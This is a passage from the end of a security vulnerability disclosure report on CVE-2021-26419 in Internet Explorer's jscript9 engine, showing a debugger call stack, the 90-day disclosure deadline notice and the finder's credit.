68b4ebbc jscript9!Js::JavascriptFunction::CallRootFunctionInternal+0xb5 11 053bcc2c 68b4eb56 jscript9!Js::JavascriptFunction::CallRootFunction+0x4d 12 053bcc74 68b4eabd jscript9!ScriptSite::CallRootFunction+0x42 13 053bccb0 68b5256e jscript9!ScriptSite::Execute+0xae 14 053bcd48 68b4e9aa jscript9!ScriptEngine::ExecutePendingScripts+0x1bf 15 053bcde0 68c27cca jscript9!ScriptEngine::ParseScriptTextCore+0x32c 16 053bce30 695a9cc1 jscript9!ScriptEngine::ParseScriptText+0x5a 17 053bce68 694a0493 MSHTML!InitializeLocalHtmlEngine+0x1f11 18 053bcec0 694b7fe7 MSHTML!GetWebPlatformObject+0x16c93 19 053bcf30 694b8493 MSHTML!GetWebPlatformObject+0x2e7e7 1a 053bd01c 694b87be MSHTML!GetWebPlatformObject+0x2ec93 1b 053bd098 694b8146 MSHTML!GetWebPlatformObject+0x2efbe 1c 053bd0b8 694d79d9 MSHTML!GetWebPlatformObject+0x2e946 1d 053bd110 694d6bb9 MSHTML!UninitializeLocalHtmlEngine+0x8b49 1e 053bd134 694d653e MSHTML!UninitializeLocalHtmlEngine+0x7d29 1f 053bd25c 695d4891 MSHTML!UninitializeLocalHtmlEngine+0x76ae 20 053bd27c 695d47fb MSHTML!DllGetClassObject+0x7291 21 053bd29c 695d478d MSHTML!DllGetClassObject+0x71fb 22 053bd2e8 695d46a7 MSHTML!DllGetClassObject+0x718d 23 053bd300 6950dccc MSHTML!DllGetClassObject+0x70a7 24 053bd378 6967d357 MSHTML!TravelLogCreateInstance+0x25cec 25 053bd3c8 69510f32 MSHTML!DllCanUnloadNow+0x13957 26 053bd3e4 76d0ef5b MSHTML!TravelLogCreateInstance+0x28f52 27 053bd410 76d05eca USER32!_InternalCallWinProc+0x2b 28 053bd4f4 76d03c3a USER32!UserCallWinProcCheckWow+0x33a 29 053bd568 76d03a00 USER32!DispatchMessageWorker+0x22a 2a 053bd574 6ad32cd4 USER32!DispatchMessageW+0x10 2b 053bf720 6ad31db3 IEFRAME!Ordinal245+0x1cb4 2c 053bf7e0 6a5bcb2c IEFRAME!Ordinal245+0xd93 2d 053bf7f8 731e26ed msIso+0x1cb2c 2e 053bf830 756cfa29 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d 2f 053bf840 770676b4 KERNEL32!BaseThreadInitThunk+0x19 30 053bf89c 77067684 ntdll!RtlGetAppContainerNamedObjectPath+0xe4 31 053bf8ac 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xb4 ############################################################ This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is 2021-05-13. Disclosure at an earlier date is possible if agreed upon by all parties. Related CVE Numbers: CVE-2021-26419. Found by: ifratric@google.com Source